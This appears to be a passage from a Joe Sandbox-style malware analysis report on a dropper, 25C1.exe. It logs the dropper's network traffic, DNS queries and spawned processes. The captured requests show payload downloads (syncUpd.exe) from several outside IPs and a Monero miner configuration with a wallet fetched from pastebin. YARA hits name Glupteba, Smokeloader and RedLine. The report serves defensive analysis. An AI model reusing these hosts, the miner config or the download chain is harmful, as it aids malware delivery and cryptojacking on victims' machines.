                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x8b20000x540.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x8b40000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x8ae0b40x8ae200361d214ece51eda33266d8785c0b3b3eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x8b20000x5400x600f5e25887af43c059ebd9f7ba08f497e8False0.3971354166666667data3.973253450395114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x8b40000xc0x200883c163f1362bb303bfd60206e080e28False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_VERSION0x8b20a00x2acdata0.44590643274853803
                                                                                          RT_MANIFEST0x8b23500x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                          2024-07-24T14:31:33.322221+0200TCP2856233ETPRO MALWARE Win32/Unknown Loader Related Activity (GET)4970680192.168.2.9185.172.128.90

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jul 24, 2024 14:31:11.853318930 CEST4970680192.168.2.9185.172.128.90
                                                                                          Jul 24, 2024 14:31:11.858354092 CEST8049706185.172.128.90192.168.2.9
                                                                                          Jul 24, 2024 14:31:11.860651016 CEST4970680192.168.2.9185.172.128.90
                                                                                          Jul 24, 2024 14:31:11.860862970 CEST4970680192.168.2.9185.172.128.90
                                                                                          Jul 24, 2024 14:31:11.865684986 CEST8049706185.172.128.90192.168.2.9
                                                                                          Jul 24, 2024 14:31:21.262495995 CEST4970714433192.168.2.951.195.138.197
                                                                                          Jul 24, 2024 14:31:21.267956972 CEST144334970751.195.138.197192.168.2.9
                                                                                          Jul 24, 2024 14:31:21.268043995 CEST4970714433192.168.2.951.195.138.197
                                                                                          Jul 24, 2024 14:31:21.268420935 CEST4970714433192.168.2.951.195.138.197
                                                                                          Jul 24, 2024 14:31:21.275573015 CEST144334970751.195.138.197192.168.2.9
                                                                                          Jul 24, 2024 14:31:21.909861088 CEST144334970751.195.138.197192.168.2.9
                                                                                          Jul 24, 2024 14:31:21.909990072 CEST144334970751.195.138.197192.168.2.9
                                                                                          Jul 24, 2024 14:31:21.910068035 CEST4970714433192.168.2.951.195.138.197
                                                                                          Jul 24, 2024 14:31:21.910902977 CEST4970714433192.168.2.951.195.138.197
                                                                                          Jul 24, 2024 14:31:21.916188955 CEST144334970751.195.138.197192.168.2.9
                                                                                          Jul 24, 2024 14:31:22.088861942 CEST144334970751.195.138.197192.168.2.9
                                                                                          Jul 24, 2024 14:31:22.223205090 CEST144334970751.195.138.197192.168.2.9
                                                                                          Jul 24, 2024 14:31:22.223278046 CEST4970714433192.168.2.951.195.138.197
                                                                                          Jul 24, 2024 14:31:22.652049065 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:22.652086973 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:22.652229071 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:22.664132118 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:22.664166927 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.277764082 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.279983044 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:23.280004025 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.282068968 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.282162905 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:23.284514904 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:23.284607887 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.284914970 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:23.284924030 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.387922049 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:23.610054970 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.610296011 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.610414028 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:23.622782946 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:23.622807026 CEST44349708104.20.3.235192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.622818947 CEST49708443192.168.2.9104.20.3.235
                                                                                          Jul 24, 2024 14:31:23.623986959 CEST4970714433192.168.2.951.195.138.197
                                                                                          Jul 24, 2024 14:31:23.624034882 CEST4970714433192.168.2.951.195.138.197
                                                                                          Jul 24, 2024 14:31:23.712946892 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:23.718189955 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.718571901 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:23.791887999 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:23.796747923 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:24.386137962 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:24.386374950 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:24.386476040 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:24.387373924 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:24.392304897 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:24.587907076 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:24.703792095 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:24.705553055 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:26.317642927 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:26.406943083 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:33.321934938 CEST8049706185.172.128.90192.168.2.9
                                                                                          Jul 24, 2024 14:31:33.322221041 CEST4970680192.168.2.9185.172.128.90
                                                                                          Jul 24, 2024 14:31:33.323419094 CEST4970680192.168.2.9185.172.128.90
                                                                                          Jul 24, 2024 14:31:33.328346968 CEST8049706185.172.128.90192.168.2.9
                                                                                          Jul 24, 2024 14:31:33.338004112 CEST4971280192.168.2.9185.172.128.127
                                                                                          Jul 24, 2024 14:31:33.342981100 CEST8049712185.172.128.127192.168.2.9
                                                                                          Jul 24, 2024 14:31:33.343085051 CEST4971280192.168.2.9185.172.128.127
                                                                                          Jul 24, 2024 14:31:33.343583107 CEST4971280192.168.2.9185.172.128.127
                                                                                          Jul 24, 2024 14:31:33.348407030 CEST8049712185.172.128.127192.168.2.9
                                                                                          Jul 24, 2024 14:31:36.365993977 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:36.410185099 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:46.407047987 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:46.614857912 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:51.341861963 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:31:51.394615889 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:31:54.729722023 CEST8049712185.172.128.127192.168.2.9
                                                                                          Jul 24, 2024 14:31:54.729871035 CEST4971280192.168.2.9185.172.128.127
                                                                                          Jul 24, 2024 14:31:54.757251978 CEST4971280192.168.2.9185.172.128.127
                                                                                          Jul 24, 2024 14:31:54.762161016 CEST8049712185.172.128.127192.168.2.9
                                                                                          Jul 24, 2024 14:31:54.770476103 CEST4971380192.168.2.9185.172.128.109
                                                                                          Jul 24, 2024 14:31:54.775310040 CEST8049713185.172.128.109192.168.2.9
                                                                                          Jul 24, 2024 14:31:54.775379896 CEST4971380192.168.2.9185.172.128.109
                                                                                          Jul 24, 2024 14:31:54.775480032 CEST4971380192.168.2.9185.172.128.109
                                                                                          Jul 24, 2024 14:31:54.781382084 CEST8049713185.172.128.109192.168.2.9
                                                                                          Jul 24, 2024 14:32:01.402167082 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:32:01.519591093 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:32:11.401983976 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:32:11.519701958 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:32:16.151645899 CEST8049713185.172.128.109192.168.2.9
                                                                                          Jul 24, 2024 14:32:16.155595064 CEST4971380192.168.2.9185.172.128.109
                                                                                          Jul 24, 2024 14:32:16.155827045 CEST4971380192.168.2.9185.172.128.109
                                                                                          Jul 24, 2024 14:32:16.160765886 CEST8049713185.172.128.109192.168.2.9
                                                                                          Jul 24, 2024 14:32:16.172677040 CEST4971580192.168.2.95.42.64.33
                                                                                          Jul 24, 2024 14:32:16.177664995 CEST80497155.42.64.33192.168.2.9
                                                                                          Jul 24, 2024 14:32:16.179595947 CEST4971580192.168.2.95.42.64.33
                                                                                          Jul 24, 2024 14:32:16.179820061 CEST4971580192.168.2.95.42.64.33
                                                                                          Jul 24, 2024 14:32:16.184576035 CEST80497155.42.64.33192.168.2.9
                                                                                          Jul 24, 2024 14:32:21.412606955 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:32:21.519638062 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:32:26.358349085 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:32:26.519701958 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:32:28.989005089 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:32:28.993995905 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:32:29.180012941 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:32:29.332159042 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:32:36.451862097 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:32:36.520056009 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:32:37.553342104 CEST80497155.42.64.33192.168.2.9
                                                                                          Jul 24, 2024 14:32:37.553474903 CEST4971580192.168.2.95.42.64.33
                                                                                          Jul 24, 2024 14:32:37.553546906 CEST4971580192.168.2.95.42.64.33
                                                                                          Jul 24, 2024 14:32:37.558692932 CEST80497155.42.64.33192.168.2.9
                                                                                          Jul 24, 2024 14:32:46.552565098 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:32:46.644814014 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:32:56.476118088 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:32:56.519655943 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:33:06.473804951 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:33:06.644293070 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:33:16.445543051 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:33:16.519750118 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:33:26.539228916 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:33:26.644707918 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:33:36.562424898 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:33:36.644773006 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:33:46.585232973 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:33:46.629169941 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:33:56.618942022 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:33:56.832254887 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:34:06.570838928 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:34:06.629144907 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:34:16.600047112 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:34:16.832292080 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:34:26.692620039 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:34:26.832324028 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:34:33.302762032 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:34:33.519915104 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:34:43.277385950 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:34:43.332356930 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:34:53.296309948 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:34:53.426120996 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:35:03.438327074 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:35:03.519895077 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:35:13.347867966 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:35:13.520148039 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:35:14.486427069 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:35:14.487775087 CEST4970914433192.168.2.951.15.58.224
                                                                                          Jul 24, 2024 14:35:14.491117954 CEST144334970951.15.58.224192.168.2.9
                                                                                          Jul 24, 2024 14:35:14.491653919 CEST4970914433192.168.2.951.15.58.224

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jul 24, 2024 14:31:21.240500927 CEST5296453192.168.2.91.1.1.1
                                                                                          Jul 24, 2024 14:31:21.254791975 CEST53529641.1.1.1192.168.2.9
                                                                                          Jul 24, 2024 14:31:22.641868114 CEST6450053192.168.2.91.1.1.1
                                                                                          Jul 24, 2024 14:31:22.651048899 CEST53645001.1.1.1192.168.2.9
                                                                                          Jul 24, 2024 14:31:23.656443119 CEST6326553192.168.2.91.1.1.1
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST53632651.1.1.1192.168.2.9

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Jul 24, 2024 14:31:21.240500927 CEST192.168.2.91.1.1.10xdfe2Standard query (0)xmr-eu2.nanopool.orgA (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:22.641868114 CEST192.168.2.91.1.1.10x7961Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.656443119 CEST192.168.2.91.1.1.10x49c5Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Jul 24, 2024 14:31:21.254791975 CEST1.1.1.1192.168.2.90xdfe2No error (0)xmr-eu2.nanopool.org51.68.137.186A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:21.254791975 CEST1.1.1.1192.168.2.90xdfe2No error (0)xmr-eu2.nanopool.org51.195.43.17A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:21.254791975 CEST1.1.1.1192.168.2.90xdfe2No error (0)xmr-eu2.nanopool.org163.172.171.111A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:21.254791975 CEST1.1.1.1192.168.2.90xdfe2No error (0)xmr-eu2.nanopool.org51.210.150.92A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:21.254791975 CEST1.1.1.1192.168.2.90xdfe2No error (0)xmr-eu2.nanopool.org51.15.61.114A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:21.254791975 CEST1.1.1.1192.168.2.90xdfe2No error (0)xmr-eu2.nanopool.org51.195.138.197A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:21.254791975 CEST1.1.1.1192.168.2.90xdfe2No error (0)xmr-eu2.nanopool.org51.15.89.13A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:22.651048899 CEST1.1.1.1192.168.2.90x7961No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:22.651048899 CEST1.1.1.1192.168.2.90x7961No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:22.651048899 CEST1.1.1.1192.168.2.90x7961No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                                                          Jul 24, 2024 14:31:23.664674044 CEST1.1.1.1192.168.2.90x49c5No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • pastebin.com
                                                                                          • 185.172.128.90
                                                                                          • 185.172.128.127
                                                                                          • 185.172.128.109
                                                                                          • 5.42.64.33

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.949706185.172.128.90807712C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jul 24, 2024 14:31:11.860862970 CEST152OUTGET /cpa/ping.php?substr=four&s=ab HTTP/1.1
                                                                                          User-Agent: NSIS_Inetc (Mozilla)
                                                                                          Host: 185.172.128.90
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.949712185.172.128.127807712C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jul 24, 2024 14:31:33.343583107 CEST135OUTGET /syncUpd.exe HTTP/1.1
                                                                                          User-Agent: NSIS_Inetc (Mozilla)
                                                                                          Host: 185.172.128.127
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.949713185.172.128.109807712C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jul 24, 2024 14:31:54.775480032 CEST135OUTGET /syncUpd.exe HTTP/1.1
                                                                                          User-Agent: NSIS_Inetc (Mozilla)
                                                                                          Host: 185.172.128.109
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.9497155.42.64.33807712C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jul 24, 2024 14:32:16.179820061 CEST139OUTGET /ping.php?substr=four HTTP/1.1
                                                                                          User-Agent: NSIS_Inetc (Mozilla)
                                                                                          Host: 5.42.64.33
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache


                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.949708104.20.3.2354432836C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-07-24 12:31:23 UTC114OUTGET /raw/2HQ8Rbid HTTP/1.1
                                                                                          Accept: */*
                                                                                          Connection: close
                                                                                          Host: pastebin.com
                                                                                          User-Agent: cpp-httplib/0.12.6
                                                                                          2024-07-24 12:31:23 UTC391INHTTP/1.1 200 OK
                                                                                          Date: Wed, 24 Jul 2024 12:31:23 GMT
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          x-frame-options: DENY
                                                                                          x-content-type-options: nosniff
                                                                                          x-xss-protection: 1;mode=block
                                                                                          cache-control: public, max-age=1801
                                                                                          CF-Cache-Status: EXPIRED
                                                                                          Last-Modified: Tue, 23 Jul 2024 14:37:34 GMT
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8a83ed4ae895176c-EWR
                                                                                          2024-07-24 12:31:23 UTC670INData Raw: 32 39 37 0d 0a 7b 0d 0a 09 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 09 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 09 22 70 6f 72 74 22 3a 20 31 34 34 33 33 2c 0d 0a 09 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 53 43 46 42 51 44 59 68 6a 6a 59 41 46 50 76 56 34 77 72 68 39 47 32 4a 73 63 73 6b 6b 72 73 35 70 6f 67 39 66 66 58 70 68 35 33 37 4c 48 43 72 69 6f 39 36 66 38 65 56 48 45 66 44 52 4d 56 41 51 41 51 65 61 54 4a 38 79 4d 79 4e 51 39 58 48 6b 74 41 63 78 5a 48 59 53 4c 4c 64 70 2e 66 6f 75 72 74 68 58 2f 70 61 73 73 77 6f 72 64 22 2c 0d 0a 09 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 09 22 72 69 67 2d 69 64 22 3a 20 22 22 2c 0d 0a 09 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 66 61
                                                                                          Data Ascii: 297{"algo": "rx/0","pool": "xmr-eu1.nanopool.org","port": 14433,"wallet": "46SCFBQDYhjjYAFPvV4wrh9G2Jscskkrs5pog9ffXph537LHCrio96f8eVHEfDRMVAQAQeaTJ8yMyNQ9XHktAcxZHYSLLdp.fourthX/password","password": "","rig-id": "","keepalive": fa
                                                                                          2024-07-24 12:31:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:08:31:07
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\Desktop\25C1.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\25C1.exe"
                                                                                          Imagebase:0x520000
                                                                                          File size:9'104'384 bytes
                                                                                          MD5 hash:CEAE65EE17FF158877706EDFE2171501
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:08:31:08
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:4'315'536 bytes
                                                                                          MD5 hash:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 88%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:08:31:08
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:2'123'218 bytes
                                                                                          MD5 hash:28B72E7425D6D224C060D3CF439C668C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 88%, ReversingLabs
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:08:31:08
                                                                                          Start date:24/07/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\FourthX.exe"
                                                                                          Imagebase:0x7ff69a530000
                                                                                          File size:2'654'720 bytes
                                                                                          MD5 hash:B03886CB64C04B828B6EC1B2487DF4A4
